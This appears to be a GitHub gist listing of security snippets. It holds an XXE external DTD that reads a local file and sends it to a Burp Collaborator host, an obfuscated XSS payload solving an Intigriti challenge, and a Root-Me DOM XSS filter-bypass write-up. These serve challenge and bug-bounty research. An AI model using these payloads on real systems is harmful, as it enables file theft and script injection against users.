Skip to content

Instantly share code, notes, and snippets.

View myuyu's full-sized avatar

El Mehdi myuyu

23 followers · 27 following
View GitHub Profile
@myuyu
myuyu / xx.dtd
Last active February 15, 2022 15:55
<!ENTITY % file SYSTEM "file:///sys/power/image_size">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://h1j4pfr9fkitxwq79j5wuzkaa1gy4n.burpcollaborator.net/POCCCCC?%file;'>">
%all;
@myuyu
myuyu / s.json
Created November 28, 2021 21:06
{
"swagger": "2.0",
@myuyu
myuyu / intigriti-Solution-0521.md
Last active June 7, 2021 14:03

alert() POC :


https://challenge-0521.intigriti.io/captcha.php?c=[][[e%2b[]][0][5]%2b[e%2b[]][0][1]%2b[e%2b[]][0][25]%2b[e%2b[]][0][18]%2b[e%2b[]][0][26]%2b[e%2b[]][0][16]%2b[0[0]%2b[]][0][0]%2b[e%2b[]][0][5]%2b[e%2b[]][0][26]%2b[e%2b[]][0][14]%2b[e%2b[]][0][16]][[e%2b[]][0][5]%2b[e%2b[]][0][1]%2b[e%2b[]][0][25]%2b[e%2b[]][0][18]%2b[e%2b[]][0][26]%2b[e%2b[]][0][16]%2b[0[0]%2b[]][0][0]%2b[e%2b[]][0][5]%2b[e%2b[]][0][26]%2b[e%2b[]][0][14]%2b[e%2b[]][0][16]]`$${[%2b/3/%2b[]][0][1]%2b[e%2b[]][0][21]%2b[e%2b[]][0][22]%2b[e%2b[]][0][16]%2b[e%2b[]][0][26]%2b[[][[0[0]%2b[]][0][4]%2b[0[0]%2b[]][0][5]%2b[0[0]%2b[]][0][6]%2b[0[0]%2b[]][0][8]]%2b[]][0][13]%2b[[][[0[0]%2b[]][0][4]%2b[0[0]%2b[]][0][5]%2b[0[0]%2b[]][0][6]%2b[0[0]%2b[]][0][8]]%2b[]][0][14]}$```

Smuggle more data with window.name and execute it with eval POC :

@myuyu
myuyu / DOMXSS~Rootme.md
Last active May 6, 2021 00:21

I noticed that color Parameter can contain any chars which this is useful to get out of the scope of variable color=" , but it's limited it reflect only 3 chars

And because the value of nickname parameter is being reflect after the color we can benefit from that by making anything after color as comment until we reach the value of the nickname parameter color="/*&nickname=*/

And then we can use , to add our malicious code with window.location but the application convert location word to ( ͡° ͜ʖ ͡°) , There's a way to bypass that through use escaped unicode for a specific char in location word which will be converted to the origin format by the Javascript itself ( because () %60 and some other chars are blocked so location is better choice )

Unfortunately the double quotes and single quotes and %60 are blocked by the application so we cannot use them to assign our host as a value to location but fortunately in the javascript /Anything/ is consider as "/anything/" so we assign our host to location